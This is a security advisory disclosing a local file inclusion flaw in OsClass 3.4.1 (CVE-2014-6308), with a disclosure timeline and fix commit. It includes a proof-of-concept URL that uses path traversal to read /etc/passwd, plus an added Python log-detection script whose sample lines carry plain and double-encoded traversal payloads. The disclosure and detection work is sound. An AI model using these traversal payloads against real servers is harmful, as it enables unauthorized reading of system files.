Information
-----------
Advisory by Netsparker.
Name : LFI Vulnerability in OsClass
Affected Software : OsClass
Affected Versions: 3.4.1 and possibly below
Vendor Homepage : http://osclass.org/
Vulnerability Type : Local File Inclusion
Severity : Critical
CVE-ID: CVE-2014-6308
Netsparker Advisory Reference : NS-14-031
Advisory URL
------------
https://www.netsparker.com/lfi-vulnerability-in-osclass/
Description
-----------
A local file inclusion vulnerability was discovered in Osclass, an
open source project that allows you to create classifieds sites.
Technical Details
-----------------
Proof of Concept URL for LFI in OsClass:
http://example.com/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
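Detection example (added here, not part of the Netsparker advisory or the Osclass code base): a log check that flags requests to the admin appearance render action whose file parameter leaves the intended directory, including percent-encoded and double-encoded forms. The log lines, client addresses and the benign file value are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [16/Sep/2014:10:01:02 +0000] "GET /osclass/oc-admin/index.php'
    '?page=appearance&action=render&file=../../../../etc/passwd HTTP/1.1" 200 1532',
    '198.51.100.7 - - [16/Sep/2014:10:01:09 +0000] "GET /osclass/oc-admin/index.php'
    '?page=appearance&action=render&file=%252e%252e%252f%252e%252e%252fetc%252fpasswd'
    ' HTTP/1.1" 200 1532',
    # Benign-looking value, constructed; the real legitimate values are not on the page.
    '203.0.113.20 - - [16/Sep/2014:10:02:00 +0000] "GET /osclass/oc-admin/index.php'
    '?page=appearance&action=render&file=admin/settings.php HTTP/1.1" 200 804',
    '203.0.113.20 - - [16/Sep/2014:10:03:00 +0000] "GET /osclass/index.php'
    '?page=search&sPattern=..%2Fcar HTTP/1.1" 200 9120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %252e%252e%252f is seen as ../"""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(file_value):
    """True if the value escapes a base directory: '..' segment, absolute path or NUL."""
    path = fully_decode(file_value).replace("\\", "/")
    if "\x00" in path or path.startswith("/") or re.match(r"[A-Za-z]:", path):
        return True
    return ".." in path.split("/")

def suspicious_requests(lines):
    """Return (client, decoded file value) for each flagged render request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/oc-admin/index.php"):
            continue
        q = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
        if "appearance" not in q.get("page", []) or "render" not in q.get("action", []):
            continue
        for value in q.get("file", []):
            if is_traversal(value):
                hits.append((line.split()[0], fully_decode(value)))
    return hits
```

Only the query string is inspected, so parameters sent in a POST body are not covered by this check.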
Advisory Timeline
-----------------
03/09/2014 - First Contact
03/09/2014 - Vulnerability fixed:
https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435
15/09/2014 - Fix released publicly in Osclass 3.4.2
Credits & Authors
-----------------
These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner.